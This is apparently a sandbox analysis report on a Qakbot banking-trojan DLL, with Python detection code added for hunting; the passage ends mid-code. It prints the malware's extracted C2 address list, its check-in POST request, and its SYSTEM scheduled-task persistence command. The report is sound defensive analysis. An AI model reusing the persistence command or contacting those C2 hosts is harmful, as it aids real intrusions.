Resubmissions

01/11/2021, 12:31 UTC
211101-pp5r3ahha4 (score 10)

31/10/2021, 09:03 UTC
211031-k1bwxacfaq (score 10)

14/10/2021, 01:44 UTC
211014-b6aflafeg4 (score 10)

Analysis

  • max time kernel
    598s
  • max time network
    611s
  • platform
    windows11_x64
  • resource
    win11
  • submitted
    01/11/2021, 12:31 UTC

General

  • Target

    260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll

  • Size

    1.0MB

  • MD5

    10c150a949585ba3603cce27707331f0

  • SHA1

    9eeb1747902951835245545b7b3b1e6408c708c2

  • SHA256

    260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840

  • SHA512

    668ea267488635b88ef6a929501f8f6b34a02ccb2fa01a311caf89f5c683f0dd6877d8714ddf8b6b24e7a447c40f2cf5c42698638a52ff7b27e6c47ce4f4578b

Malware Config

Extracted

Family

qakbot

Version

402.363

Botnet

tr

Campaign

1633334141

C2

75.75.179.226:443

185.250.148.74:443

122.11.220.212:2222

120.150.218.241:995

103.148.120.144:443

140.82.49.12:443

40.131.140.155:995

206.47.134.234:2222

73.230.205.91:443

190.198.206.189:2222

103.157.122.198:995

81.250.153.227:2222

167.248.100.227:443

96.57.188.174:2078

217.17.56.163:2222

217.17.56.163:2078

41.228.22.180:443

136.232.34.70:443

68.186.192.69:443

167.248.111.245:443

Attributes
  • salt

    jHxastDcds)oMc=jvh7wdUhxcsdt2

Signatures

  • Qakbot/Qbot

    Qakbot (Qbot) is a banking trojan and loader with worm-like lateral-movement capabilities; the sandbox extracted its configuration from this sample (see Malware Config above).

  • Sets service image path in registry (2 TTPs)
  • Drops file in Windows directory (8 IoCs)
  • Checks processor information in registry (2 TTPs, 2 IoCs)

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) (1 TTP, 1 IoC)

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Modifies data under HKEY_USERS (64 IoCs)
  • Suspicious behavior: EnumeratesProcesses (2 IoCs)
  • Suspicious behavior: MapViewOfSection (1 IoC)
  • Suspicious use of AdjustPrivilegeToken (64 IoCs)
  • Suspicious use of WriteProcessMemory (13 IoCs)

Processes

  • C:\Windows\system32\rundll32.exe
    rundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#1
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2212
    • C:\Windows\SysWOW64\rundll32.exe
      rundll32.exe C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll,#1
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:920
      • C:\Windows\SysWOW64\explorer.exe
        C:\Windows\SysWOW64\explorer.exe
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:4032
        • C:\Windows\SysWOW64\schtasks.exe
          "C:\Windows\system32\schtasks.exe" /Create /RU "NT AUTHORITY\SYSTEM" /tn ewvwcyddvg /tr "regsvr32.exe -s \"C:\Users\Admin\AppData\Local\Temp\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll\"" /SC ONCE /Z /ST 07:54 /ET 08:06
          4⤵
          • Creates scheduled task(s)
          PID:4056
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:948
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
    1⤵
    • Drops file in Windows directory
    • Modifies data under HKEY_USERS
    • Suspicious use of AdjustPrivilegeToken
    PID:1872
  • C:\Windows\system32\svchost.exe
    C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
    1⤵
    • Checks processor information in registry
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of WriteProcessMemory
    PID:2564
    • C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
      C:\Windows\uus\AMD64\MoUsoCoreWorker.exe
      2⤵
      PID:1244
  • C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe
    C:\Windows\winsxs\amd64_microsoft-windows-servicingstack_31bf3856ad364e35_10.0.22000.100_none_04da31ff4c67c24a\TiWorker.exe -Embedding
    1⤵
    • Drops file in Windows directory
    • Suspicious use of AdjustPrivilegeToken
    PID:2284
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:2604
  • C:\Windows\System32\WaaSMedicAgent.exe
    C:\Windows\System32\WaaSMedicAgent.exe d24bb2d71bcbb36c2a75cc2dfbe6920d zpztTPQJb0KSdWS/IXZ/5g.0.1.0.3.0
    1⤵
    • Modifies data under HKEY_USERS
    PID:3416
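
The process tree above is the whole Qakbot execution chain in four steps: the 64-bit rundll32.exe (PID 2212) loads the DLL by export ordinal (#1) from the user's Temp directory and hands off to its 32-bit SysWOW64 copy (PID 920); that process spawns a SysWOW64 explorer.exe (PID 4032) and is flagged for WriteProcessMemory and MapViewOfSection, i.e. it injects into the child; the injected explorer.exe then registers a one-shot scheduled task running as NT AUTHORITY\SYSTEM that re-executes the same DLL through regsvr32 -s. The 132KB region dumped from both PID 920 and PID 4032 in the Downloads section is consistent with the same payload being mapped in both processes. The following Python is an added detection example, not tria.ge code: it replays the chain as constructed Sysmon Event ID 1 style process-creation records (PIDs, images and command lines taken from the tree; the parent PIDs of the two top-level processes are assumed, since the report does not show them) and flags each stage, escalating when the task creator is an explorer.exe whose parent is rundll32.exe.

```python
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    ppid: int
    image: str     # Sysmon "Image" (full path of the new process)
    cmdline: str   # Sysmon "CommandLine"


# DLL path exactly as it appears in the report's process tree.
DLL_PATH = (r"C:\Users\Admin\AppData\Local\Temp"
            r"\260e2d5769f0a50a7b49d4c43059221eb7acc4b9fc460763e0cfcd793f2a6840.dll")

# Constructed events mirroring the tree on the page. PIDs, images and command lines are
# from the report; the parent PIDs of the two top-level processes (1024, 700) are assumed.
SAMPLE_EVENTS = [
    ProcEvent(2212, 1024, r"C:\Windows\system32\rundll32.exe", f"rundll32.exe {DLL_PATH},#1"),
    ProcEvent(920, 2212, r"C:\Windows\SysWOW64\rundll32.exe", f"rundll32.exe {DLL_PATH},#1"),
    ProcEvent(4032, 920, r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    ProcEvent(4056, 4032, r"C:\Windows\SysWOW64\schtasks.exe",
              '"C:\\Windows\\system32\\schtasks.exe" /Create /RU "NT AUTHORITY\\SYSTEM" '
              f'/tn ewvwcyddvg /tr "regsvr32.exe -s \\"{DLL_PATH}\\"" '
              '/SC ONCE /Z /ST 07:54 /ET 08:06'),
    # Benign Windows Update activity from the same report; must not be flagged.
    ProcEvent(2564, 700, r"C:\Windows\system32\svchost.exe",
              r"C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc"),
    ProcEvent(1244, 2564, r"C:\Windows\uus\AMD64\MoUsoCoreWorker.exe",
              r"C:\Windows\uus\AMD64\MoUsoCoreWorker.exe"),
]

USER_TEMP = re.compile(r"\\Users\\[^\\]+\\AppData\\Local\\Temp\\", re.I)
ORDINAL_EXPORT = re.compile(r"\.dll,#\d+\b", re.I)
SYSTEM_RUNAS = re.compile(r'/RU\s+"?NT AUTHORITY\\SYSTEM"?', re.I)


def image_name(path):
    return path.rsplit("\\", 1)[-1].lower()


def ancestry(by_pid, pid):
    """Yield ancestor events of `pid`, nearest parent first; stops at an unknown PID."""
    ev, seen = by_pid.get(pid), {pid}
    while ev is not None and ev.ppid in by_pid and ev.ppid not in seen:
        ev = by_pid[ev.ppid]
        seen.add(ev.pid)
        yield ev


def detect(events):
    """Return (rule, pid) findings for each stage of the chain seen in the report."""
    by_pid = {e.pid: e for e in events}
    findings = []
    for e in events:
        name = image_name(e.image)
        parent = by_pid.get(e.ppid)
        parent_name = image_name(parent.image) if parent else ""
        low = e.cmdline.lower()

        # Stage 1: rundll32 loading a DLL from %LOCALAPPDATA%\Temp by export ordinal.
        if name == "rundll32.exe" and USER_TEMP.search(e.cmdline) and ORDINAL_EXPORT.search(e.cmdline):
            findings.append(("rundll32_temp_dll_ordinal", e.pid))

        # Stage 2: explorer.exe started by rundll32 (explorer is normally a child of
        # userinit/winlogon); the report flags this process for WriteProcessMemory.
        if name == "explorer.exe" and parent_name == "rundll32.exe":
            findings.append(("explorer_spawned_by_rundll32", e.pid))

        # Stage 3: a SYSTEM scheduled task that re-runs a DLL from a user-writable
        # directory via regsvr32 -s, the persistence command shown on the page.
        if (name == "schtasks.exe" and "/create" in low and "regsvr32" in low
                and SYSTEM_RUNAS.search(e.cmdline) and USER_TEMP.search(e.cmdline)):
            findings.append(("schtasks_system_regsvr32_temp_dll", e.pid))
            # Escalate when the creator is explorer.exe spawned by rundll32.exe.
            chain = [image_name(a.image) for a in ancestry(by_pid, e.pid)]
            if chain[:2] == ["explorer.exe", "rundll32.exe"]:
                findings.append(("qakbot_persistence_chain", e.pid))
    return findings


if __name__ == "__main__":
    for rule, pid in detect(SAMPLE_EVENTS):
        print(f"{rule:40s} pid={pid}")
```

Each stage is a reasonable standalone hunt query on its own; the chained form exists so the scheduled-task event, which is the one an endpoint would log regardless of whether the injection itself was caught, can be raised with high confidence instead of joining the general schtasks noise.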

    Network

    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      52.242.101.226
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      20.54.89.106
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-us
      DNS
      settings-win.data.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      settings-win.data.microsoft.com
      IN A
      Response
      settings-win.data.microsoft.com
      IN CNAME
      settingsfd-geo.trafficmanager.net
      settingsfd-geo.trafficmanager.net
      IN CNAME
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      IN A
      51.124.78.146
    • flag-us
      DNS
      config.edge.skype.com
      Remote address:
      8.8.8.8:53
      Request
      config.edge.skype.com
      IN A
      Response
      config.edge.skype.com
      IN CNAME
      config.edge.skype.com.trafficmanager.net
      config.edge.skype.com.trafficmanager.net
      IN CNAME
      l-0007.config.skype.com
      l-0007.config.skype.com
      IN CNAME
      config-edge-skype.l-0007.l-msedge.net
      config-edge-skype.l-0007.l-msedge.net
      IN CNAME
      l-0007.dc-msedge.net
      l-0007.dc-msedge.net
      IN A
      13.107.43.16
    • flag-us
      DNS
      nexusrules.officeapps.live.com
      Remote address:
      8.8.8.8:53
      Request
      nexusrules.officeapps.live.com
      IN A
      Response
      nexusrules.officeapps.live.com
      IN CNAME
      prod.nexusrules.live.com.akadns.net
      prod.nexusrules.live.com.akadns.net
      IN A
      52.109.12.18
    • flag-us
      DNS
      time.windows.com
      Remote address:
      8.8.8.8:53
      Request
      time.windows.com
      IN A
      Response
      time.windows.com
      IN CNAME
      twc.trafficmanager.net
      twc.trafficmanager.net
      IN A
      20.101.57.9
    • flag-us
      DNS
      login.live.com
      Remote address:
      8.8.8.8:53
      Request
      login.live.com
      IN A
      Response
      login.live.com
      IN CNAME
      login.msa.msidentity.com
      login.msa.msidentity.com
      IN CNAME
      www.tm.lg.prod.aadmsa.akadns.net
      www.tm.lg.prod.aadmsa.akadns.net
      IN CNAME
      prda.aadg.msidentity.com
      prda.aadg.msidentity.com
      IN CNAME
      www.tm.a.prd.aadg.akadns.net
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.2
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.4
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.69
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.71
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.132
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.8
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.73
      www.tm.a.prd.aadg.akadns.net
      IN A
      20.190.160.134
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      40.125.122.176
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      95.101.78.193
      a767.dspw65.akamai.net
      IN A
      95.101.78.209
    • flag-us
      DNS
      ocsp.digicert.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.digicert.com
      IN A
      Response
      ocsp.digicert.com
      IN CNAME
      cs9.wac.phicdn.net
      cs9.wac.phicdn.net
      IN A
      93.184.220.29
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      fe3cr.delivery.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fe3cr.delivery.mp.microsoft.com
      IN A
      Response
      fe3cr.delivery.mp.microsoft.com
      IN CNAME
      fe3.delivery.mp.microsoft.com
      fe3.delivery.mp.microsoft.com
      IN CNAME
      glb.cws.prod.dcat.dsp.trafficmanager.net
      glb.cws.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.108.96
    • flag-us
      DNS
      slscr.update.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      slscr.update.microsoft.com
      IN A
      Response
      slscr.update.microsoft.com
      IN CNAME
      sls.update.microsoft.com
      sls.update.microsoft.com
      IN CNAME
      glb.sls.prod.dcat.dsp.trafficmanager.net
      glb.sls.prod.dcat.dsp.trafficmanager.net
      IN A
      52.152.110.14
    • flag-us
      DNS
      settings-win.data.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      settings-win.data.microsoft.com
      IN A
      Response
      settings-win.data.microsoft.com
      IN CNAME
      settingsfd-geo.trafficmanager.net
      settingsfd-geo.trafficmanager.net
      IN CNAME
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      settingsfd-prod-weu1-endpoint.trafficmanager.net
      IN A
      51.124.78.146
    • flag-us
      DNS
      fs.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      fs.microsoft.com
      IN A
      Response
      fs.microsoft.com
      IN CNAME
      prod.fs.microsoft.com.akadns.net
      prod.fs.microsoft.com.akadns.net
      IN CNAME
      fs-wildcard.microsoft.com.edgekey.net
      fs-wildcard.microsoft.com.edgekey.net
      IN CNAME
      fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
      fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net
      IN CNAME
      e1723.g.akamaiedge.net
      e1723.g.akamaiedge.net
      IN A
      104.80.224.57
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-us
      DNS
      s2.symcb.com
      Remote address:
      8.8.8.8:53
      Request
      s2.symcb.com
      IN A
      Response
      s2.symcb.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      sv.symcd.com
      Remote address:
      8.8.8.8:53
      Request
      sv.symcd.com
      IN A
      Response
      sv.symcd.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      s.symcd.com
      Remote address:
      8.8.8.8:53
      Request
      s.symcd.com
      IN A
      Response
      s.symcd.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      ts-ocsp.ws.symantec.com
      Remote address:
      8.8.8.8:53
      Request
      ts-ocsp.ws.symantec.com
      IN A
      Response
      ts-ocsp.ws.symantec.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      ocsp.verisign.com
      Remote address:
      8.8.8.8:53
      Request
      ocsp.verisign.com
      IN A
      Response
      ocsp.verisign.com
      IN CNAME
      ocsp-ds.ws.symantec.com.edgekey.net
      ocsp-ds.ws.symantec.com.edgekey.net
      IN CNAME
      e8218.dscb1.akamaiedge.net
      e8218.dscb1.akamaiedge.net
      IN A
      23.51.123.27
    • flag-us
      DNS
      mrodevicemgr.officeapps.live.com
      Remote address:
      8.8.8.8:53
      Request
      mrodevicemgr.officeapps.live.com
      IN A
      Response
      mrodevicemgr.officeapps.live.com
      IN CNAME
      prod.mrodevicemgr.live.com.akadns.net
      prod.mrodevicemgr.live.com.akadns.net
      IN A
      52.109.88.44
    • flag-us
      DNS
      tsfe.trafficshaping.dsp.mp.microsoft.com
      Remote address:
      8.8.8.8:53
      Request
      tsfe.trafficshaping.dsp.mp.microsoft.com
      IN A
      Response
      tsfe.trafficshaping.dsp.mp.microsoft.com
      IN CNAME
      tsfe.trafficmanager.net
      tsfe.trafficmanager.net
      IN A
      20.54.110.119
    • flag-us
      DNS
      ctldl.windowsupdate.com
      Remote address:
      8.8.8.8:53
      Request
      ctldl.windowsupdate.com
      IN A
      Response
      ctldl.windowsupdate.com
      IN CNAME
      wu-shim.trafficmanager.net
      wu-shim.trafficmanager.net
      IN CNAME
      download.windowsupdate.com.edgesuite.net
      download.windowsupdate.com.edgesuite.net
      IN CNAME
      a767.dspw65.akamai.net
      a767.dspw65.akamai.net
      IN A
      104.110.191.140
      a767.dspw65.akamai.net
      IN A
      104.110.191.133
    • flag-in
      POST
      https://136.232.34.70/t4
      explorer.exe
      Remote address:
      136.232.34.70:443
      Request
      POST /t4 HTTP/1.1
      Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
      Host: 136.232.34.70
      Content-Length: 77
      Cache-Control: no-cache
      Response
      HTTP/1.1 200 OK
      Server: nginx/1.9.12
      Content-Length: 146
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.3kB
      3.3kB
      12
      9
    • 52.152.108.96:443
      fe3cr.delivery.mp.microsoft.com
      tls
      1.2kB
      3.1kB
      12
      9
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.2kB
      3.2kB
      12
      9
    • 52.242.101.226:443
      slscr.update.microsoft.com
      tls
      1.3kB
      3.3kB
      12
      9
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls
      1.5kB
      9.2kB
      14
      14
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls
      1.3kB
      3.3kB
      12
      9
    • 127.0.0.1:5985
    • 52.152.108.96:443
      fe3cr.delivery.mp.microsoft.com
      tls
      1.2kB
      3.1kB
      12
      9
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls
      1.2kB
      3.2kB
      12
      9
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls, https
      1.8kB
      8.1kB
      14
      14
    • 51.124.78.146:443
      settings-win.data.microsoft.com
      tls, https
      MoUsoCoreWorker.exe
      2.0kB
      14.6kB
      16
      18
    • 40.125.122.176:443
      slscr.update.microsoft.com
      tls, https
      wuauserv
      1.3kB
      3.3kB
      12
      9
    • 20.54.110.119:443
      tsfe.trafficshaping.dsp.mp.microsoft.com
      tls, https
      wuauserv
      2.7kB
      6.0kB
      14
      12
    • 20.86.173.234:80
      46 B
      1
    • 52.168.112.66:443
      322 B
      7
    • 97.98.130.50:443
      explorer.exe
      156 B
      3
    • 97.98.130.50:443
      explorer.exe
      156 B
      3
    • 97.98.130.50:443
      explorer.exe
      156 B
      3
    • 97.98.130.50:443
      explorer.exe
      156 B
      3
    • 73.52.50.32:443
      explorer.exe
      156 B
      3
    • 73.52.50.32:443
      explorer.exe
      156 B
      3
    • 73.52.50.32:443
      explorer.exe
      156 B
      3
    • 73.52.50.32:443
      explorer.exe
      156 B
      3
    • 70.37.217.196:443
      explorer.exe
      156 B
      3
    • 70.37.217.196:443
      explorer.exe
      156 B
      3
    • 70.37.217.196:443
      explorer.exe
      156 B
      3
    • 70.37.217.196:443
      explorer.exe
      156 B
      3
    • 216.201.162.158:443
      explorer.exe
      156 B
      3
    • 216.201.162.158:443
      explorer.exe
      156 B
      3
    • 216.201.162.158:443
      explorer.exe
      156 B
      3
    • 216.201.162.158:443
      explorer.exe
      156 B
      3
    • 136.232.34.70:443
      https://136.232.34.70/t4
      tls, http
      explorer.exe
      1.9kB
      1.7kB
      11
      7

      HTTP Request

      POST https://136.232.34.70/t4

      HTTP Response

      200
    • 81.250.153.227:2222
      explorer.exe
      156 B
      3
    • 81.250.153.227:2222
      explorer.exe
      156 B
      3
    • 81.250.153.227:2222
      explorer.exe
      156 B
      3
    • 81.250.153.227:2222
      explorer.exe
      156 B
      3
    • 8.8.8.8:53
      slscr.update.microsoft.com
      dns
      1.9kB
      4.9kB
      27
      27

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      52.242.101.226

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      20.54.89.106

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

      DNS Request

      settings-win.data.microsoft.com

      DNS Response

      51.124.78.146

      DNS Request

      config.edge.skype.com

      DNS Response

      13.107.43.16

      DNS Request

      nexusrules.officeapps.live.com

      DNS Response

      52.109.12.18

      DNS Request

      time.windows.com

      DNS Response

      20.101.57.9

      DNS Request

      login.live.com

      DNS Response

      20.190.160.2
      20.190.160.4
      20.190.160.69
      20.190.160.71
      20.190.160.132
      20.190.160.8
      20.190.160.73
      20.190.160.134

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      40.125.122.176

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      95.101.78.193
      95.101.78.209

      DNS Request

      ocsp.digicert.com

      DNS Response

      93.184.220.29

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      fe3cr.delivery.mp.microsoft.com

      DNS Response

      52.152.108.96

      DNS Request

      slscr.update.microsoft.com

      DNS Response

      52.152.110.14

      DNS Request

      settings-win.data.microsoft.com

      DNS Response

      51.124.78.146

      DNS Request

      fs.microsoft.com

      DNS Response

      104.80.224.57

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

      DNS Request

      s2.symcb.com

      DNS Response

      23.51.123.27

      DNS Request

      sv.symcd.com

      DNS Response

      23.51.123.27

      DNS Request

      s.symcd.com

      DNS Response

      23.51.123.27

      DNS Request

      ts-ocsp.ws.symantec.com

      DNS Response

      23.51.123.27

      DNS Request

      ocsp.verisign.com

      DNS Response

      23.51.123.27

      DNS Request

      mrodevicemgr.officeapps.live.com

      DNS Response

      52.109.88.44

      DNS Request

      tsfe.trafficshaping.dsp.mp.microsoft.com

      DNS Response

      20.54.110.119

      DNS Request

      ctldl.windowsupdate.com

      DNS Response

      104.110.191.140
      104.110.191.133

    • 20.101.57.9:123
      time.windows.com
      ntp
      76 B
      1
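
Two parts of this report belong together: the C2 list in the Malware Config section, and the Network list above, where explorer.exe reaches several bare IP addresses on 443 and 2222 with only 156 B in three packets (unanswered connection attempts) before getting an HTTP 200 from 136.232.34.70:443 on a form POST to /t4 with an IE11-style User-Agent. Both 136.232.34.70:443 and 81.250.153.227:2222 appear in the extracted C2 list; the other explorer.exe targets do not, so matching on the list alone would miss them. The following Python is an added example, not tria.ge code: it parses the extracted C2 list, fingerprints the captured check-in request, and triages a constructed set of flow records (addresses, owning processes and byte/packet counts copied from the Network list; the Flow record layout and rule names are this example's own). The Accept-header check is taken from this one capture and is labelled as such in the code; it is not presented as a family-wide signature.

```python
import ipaddress
import re
from dataclasses import dataclass

# Extracted C2 list, copied from the Malware Config section of this report.
C2_CONFIG = """
75.75.179.226:443 185.250.148.74:443 122.11.220.212:2222 120.150.218.241:995
103.148.120.144:443 140.82.49.12:443 40.131.140.155:995 206.47.134.234:2222
73.230.205.91:443 190.198.206.189:2222 103.157.122.198:995 81.250.153.227:2222
167.248.100.227:443 96.57.188.174:2078 217.17.56.163:2222 217.17.56.163:2078
41.228.22.180:443 136.232.34.70:443 68.186.192.69:443 167.248.111.245:443
"""

# The check-in request captured in the Network section (request head only; the
# 77-byte body is not shown on the page).
QAKBOT_POST = """POST /t4 HTTP/1.1
Accept: application/x-shockwave-flash, image/gif, image/jpeg, image/pjpeg, */*
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) like Gecko
Host: 136.232.34.70
Content-Length: 77
Cache-Control: no-cache
"""


def parse_c2_list(text):
    """Return the set of (ip, port) pairs found in a whitespace-separated config dump."""
    pairs = re.findall(r"(\d{1,3}(?:\.\d{1,3}){3}):(\d{1,5})", text)
    return {(ip, int(port)) for ip, port in pairs if is_ipv4(ip)}


def is_ipv4(host):
    """True for a literal IPv4 address (an optional :port suffix is ignored)."""
    try:
        ipaddress.IPv4Address(host.split(":")[0])
        return True
    except ValueError:
        return False


def parse_http_request(raw):
    """Split an HTTP/1.1 request head into (method, path, {lowercased header: value})."""
    lines = raw.strip().splitlines()
    method, path, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        key, _, value = line.partition(":")
        headers[key.strip().lower()] = value.strip()
    return method, path, headers


@dataclass
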